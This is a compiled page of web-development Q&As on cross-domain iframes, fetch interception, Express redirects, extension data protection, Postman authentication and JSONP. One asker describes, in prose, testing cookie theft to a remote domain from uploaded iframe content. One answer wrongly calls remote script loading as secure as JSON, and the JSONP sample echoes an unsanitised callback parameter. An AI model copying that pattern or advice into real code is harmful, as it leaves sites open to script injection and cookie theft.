Security implications for setting document.domain in iframed content - security

I have two sub domains content and www under the domain example.com. Content from content.example.com is being presented in www.example.com via an iframe.
Because the content on content.example.com needs to communicate to www.example.com I've set document.domain="example.com" and also set allow-scripts and allow-same-origin on the iframe.
I'm concerned that if users can upload the content to be displayed in the iframe it could be exploitable, i.e., send the content of the cookies to a remote domain to hijack the session or other security exploits.
I've setup another domain, www.example2.com and put an AJAX request in the iframed content at content.example.com to test my theory and am sending document.cookie to the remote domain. This results in the _ga cookies being sent to the remote domain. I've allowed header('Access-Control-Allow-Origin: *') on the remote domain so it doesn't cause any issues.
Why are only the _ga cookies being sent? I have a number of other cookies in there on the same domain and path as the _ga cookies yet they aren't sent. Are there other security risks in doing this? Ideally I'd like it only possible for communication between content.example.com and www.example.com and it looks like it's mostly doing this, except for Google Analytics cookies, which will mean that others might be able to do it too.

You can use JSONP to communicate different domains, regardless of cross-domain settings and policies.
However JSONP requires the server side to build the callback function with the returned data as a parameter.
I would suggest to load plain Javascript content from the server, which has the same cross-domain independence and security as a JSON request.
Say you have a Javascript file, data.js, in content.example.com, or a service returning the same content as the file in the response,
with a JSON object, prefixed with a variable assignment:
result = {
"string1": "text1",
"object1": {
"string2": "text2",
"number1": 5.6
},
"number2": 7,
"array1": ["text3", "text4"]
}
Then, in your web page, in www.example.com, you can have a script with function loadJS,
which loads the server response as a script:
var loadJS = function (url, callback) {
var script = document.createElement('script');
script.type = "text/javascript";
script.src = url;
script.onload = function (ev) {
callback(window.result);
delete window.result;
this.parentNode.removeChild(this);
};
document.body.appendChild(script);
};
window.onload = function () {
loadJS('http://content.example.com/data.js', function (data) {
console.log(data);
});
};
Same function can be used in content.example.com for requests in the opposite direction.
In order to set cookies or perform any other functionality available in JS,
the response script, data.js, may contain a function rather than a JSON object:
result = (function () {
document.cookie = "cookie1=Value1; cookie2=Value2;";
return true;
})();

Related

How can I intercept only one endpoint of a domain for my browser API calls?

Suppose I enter a (public) website that makes 3 XHR/fetch calls on 3 different endpoints:
https://api.example.com/path1
https://api.example.com/path2
https://api.example.com/path3
What I want to achieve is intercept the call to https://api.example.com/path2 only, redirect it to a local service (localhost:8000) and let path1 and path3 through to the original domain.
What kind of options do I have here? I have studied a lot of approaches to this issue:
DNS rewriting - this solution is not suitable as I still have to intercept path1 and path3, only redirect them to the original IPs and try to mimic the headers as much as possible - which means I would have to do a specific proxy configuration for each intercepted domain - this is unfeasible
Chrome extensions - found none to deal specifically with single endpoint intercepting
Overwriting both fetch and XmlHttpRequest after page load - still doesn't cover all scenarios, maybe some websites cache the values of fetch and XmlHttpRequest before page load (?)
Combining the chrome extension and fetch overwrite will work.
download an webextension that let you load javascript code before a given page loads, e.g. User JavaScript and CSS
Add the following script to run before your page loads, base on: Intercepting JavaScript Fetch API requests and responses
const { fetch: originalFetch } = window;
window.fetch = async (...args) => {
let [resource, config ] = args;
// request interceptor starts
resource = resource === "https://api.example.com/path2" ? "http://localhost:8000/path2" : resource
// request interceptor ends
const response = await originalFetch(resource, config);
// response interceptor here
return response;
};

nodejs-express how do I redirect a page to client passing some data from server?

I have this code with session check and i want to pass data from server to client
I want to display the session name in the lobby.html page
but im new to nodejs express and i dont know how to.
app.get('/lobby', (req, res) => {
// check session
sess = req.session;
if(sess.name) {
// redirect to lobby.html passing the session name
}
else
res.sendFile(path.resolve(__dirname, './public/client/error.html'));
});
```
Redirects are by their definition GET requests. The ways to get data from one get request to the next are as follows:
Add a query parameter to the URL you're redirecting to and then have the client or the server parse the data out of the query parameter and adjust the content accordingly.
Set a custom cookie with the data, then do the redirect and have the client or server pull the data from the cookie on the redirected request.
Have the server put some data into the server-side session and have the subsequent redirected request get the data from the session and adjust the content accordingly.
Both #2 and #3 are vulnerable to subtle race conditions if there are multiple incoming requests, the cookie or session data may get acted upon for some other incoming URL rather than the redirected URL unless the data also includes exactly which URL it is supposed to apply to. Option #1 is not susceptible to that type of race condition.
Looks like req.sess is passed from browser, so why not get name through document.cookie on the browser side directly?

I need to redirect a file from server to a folder without htaccess

i have a file on my "website/folder/file" which i would like to redirect to prevent user to access that file, without using htaccess.
My file is a huge DB containing url's, i don't want the users access to that file by typing the direct URL to the file.
That file is called & used by my chrome extension, who block access to the user if he tries to reach one of the url's in that DB.
Problem is by typing the direct url to that file we have access...
i tried everything with the .htaccess file, i know we can block, redirect, etc with the .htaccess file but if i redirect or block the url of the DB with the htaccess, my extension doesn't work anymore because the DB is blocked by the htaccess file.
so i'm trying to find a solution, maybe is an !
my background.js
'use strict';
let db = []; // session Global
// ----- parse & cache the database data
fetch('http://thmywebsite.com/folder/db.dat')
.then(response => response.text())
.then(text => { db = text.trim().split(/[\r\n]+/); })
.catch(error => console.log(error));
chrome.webRequest.onBeforeRequest.addListener(details => {
let url = new URL(details.url);
return { cancel: url && url.hostname && db.includes(url.hostname) };
},
{ urls: ["http://*/*", "https://*/*"] },
["blocking"]
);
chrome.extension.isAllowedIncognitoAccess(function (isAllowedAccess) {
if (isAllowedAccess) return; // Great, we've got access
})
You can't realistically do this. You can't block a resource that needs to be available publicly (by your client-side script).
You can potentially make this a little harder for someone wanting your DB, by perhaps sending a unique HTTP request header as part of your fetch(). You can then check for the presence of this header server-side (in .htaccess) and block the request otherwise. This prevents a user from casually requesting this file directly in their browser. However, this is trivial to bypass for anyone who looks at your script (or monitors the network traffic) as they can construct the request to mimic your script. But let's not forget, your script downloads the file to the browser anyway - so it's already there for anyone to save.
You need to rethink your data model. If you don't want the DB to be publicly accessible then it simply can't be publicly accessible. Instead of your script downloading the DB to the client and processing the request locally, you could send the request to your server. Your server then performs the necessary lookup (on the "hidden" database) and sends back a response. Your script then acts on this response.

Postman Requests Receive a HTTP 401 Status Code

I am working on creating a Node.js REST API, using the Express module, that redirects HTTP GET and PUT requests to another server. However, when running test queries in Postman, I always get HTTP 401 Unauthorized responses. Yet, when I try the same on query on the Chrome browser I get a successful response (HTTP 302). I read through some documentation on the HTTP request/response cycle and authorization. The server I am redirecting to uses HTTP Basic authentication. In my code I am redirecting the API call to my application server using the res.redirect(server) method. In my Postman request I am setting the username/password in Authorization tab for my request. I know this is gets encoded using base64, but I am guessing this isn't being passed on the redirect when done through Postman.
The following code snippets show what I've created thus far.
This is the Express route I created for GET requests
app.get('/companyrecords/:name', function(req, res) {
var credentials = Buffer.from("username:password").toString('base64');
console.log(req);
var requestURL = helperFunctions.createURL(req);
res.redirect(requestURL);
});
I define a function called createURL inside a file called helperFunctions. The purpose of this function is set up the URL to which requests will be directed to. Here is the code for that function.
module.exports.createURL = function (requestURL) {
var pathname = requestURL._parsedUrl.pathname;
var tablename = pathname.split("/")[1];
var filter = `?&filter=name=\'${requestURL.params.hostname}\'`;
var fullPath = BASE_URL + tablename.concat('/') + filter;
console.log(fullPath);
return fullPath;
}
Where BASE_URL is a constant defined in the following form:
http://hostname:port/path/to/resource/
Is this something I need to change in my code to support redirects through Postman or is there a setting in Postman that I need to change so that my queries can execute successfully.
Unfortunately you can't tell Postman not to do what was arguably the correct thing.
Effectively clients should be removing authorisation headers on a redirect. This is to prevent a man-in-the-middle from sticking a 302 in and collecting all your usernames and passwords on their own server. However, as you've noticed, a lot of clients do not behave perfectly (and have since maintained this behaviour for legacy reasons).
As discussed here however you do have some options:
Allow a secondary way of authorising using a query string: res.redirect(302, 'http://appServer:5001/?auth=auth') however this is not great because query strings are often logged without redacting
Act as a proxy and pipe the authenticated request yourself: http.request(authedRequest).on('response', (response) => response.pipe(res))
Respond with a 200 and the link for your client to then follow.

JSONP request working cross-domain, but can't figure out origin

I'm trying out a JSONP call. I have a NodeJs app in server 1, under domain domain1.com looking like this:
server.get('/api/testjsonp', function(req, res) {
var clientId = req.param('clientId');
res.header('Content-Type', 'application/json');
res.header('Charset', 'utf-8')
res.send(req.query.callback + '({"something": "rather", "more": "fun",
"sourceDomain": "' + req.headers.origin + '"' + ',"clientId":"' + clientId +
'"});');
});
In another server (server 2) and under a different domain (domain2.com), I have created a test html page with a call like this:
var data = { clientId : 1234567890 };
$.ajax({
dataType: 'jsonp',
data: data,
jsonp: 'callback',
url: 'https://domain1.com/api/testjsonp?callback=1',
success: function(data) {
alert('success');
},
error: function(err){
alert('ERROR');
console.log(err);
}
});
I have 2 problems here:
1) Why is this working? Isn't it a cross-domain call and therefore I'd need to implement the ALLOW-ORIGIN headers stuff? I'm following this example:
http://css.dzone.com/articles/ajax-requests-other-domains
http://benbuckman.net/tech/12/04/cracking-cross-domainallow-origin-nut
2) In the server, I can't figure out which domain is making the call, req.headers.origin is always undefined. I'd like to be able to know which domain is calling, to prevent unwanted calls. Alternative I could check for the calling IP, any idea how?
Many thanks
Why is this working? Isn't it a cross-domain call and therefore I'd need to implement the ALLOW-ORIGIN headers stuff? I
Are far as the browser is concerned, you aren't directly reading data from a different origin. You are loading a JavaScript program from another origin (and it happens to have some data bundled in it).
In the server, I can't figure out which domain is making the call, req.headers.origin is always undefined. I'd like to be able to know which domain is calling, to prevent unwanted calls.
The URL of the referring page is stored in the Referer header, not the Origin header. It is, however, optional and won't be sent under many circumstances.
If you want to limit access to the data to certain sites, then you can't use JSON-P. Use plain JSON and CORS instead.
Alternative I could check for the calling IP, any idea how?
That would give you the address of the client, not the server that directed the client to you.

Resources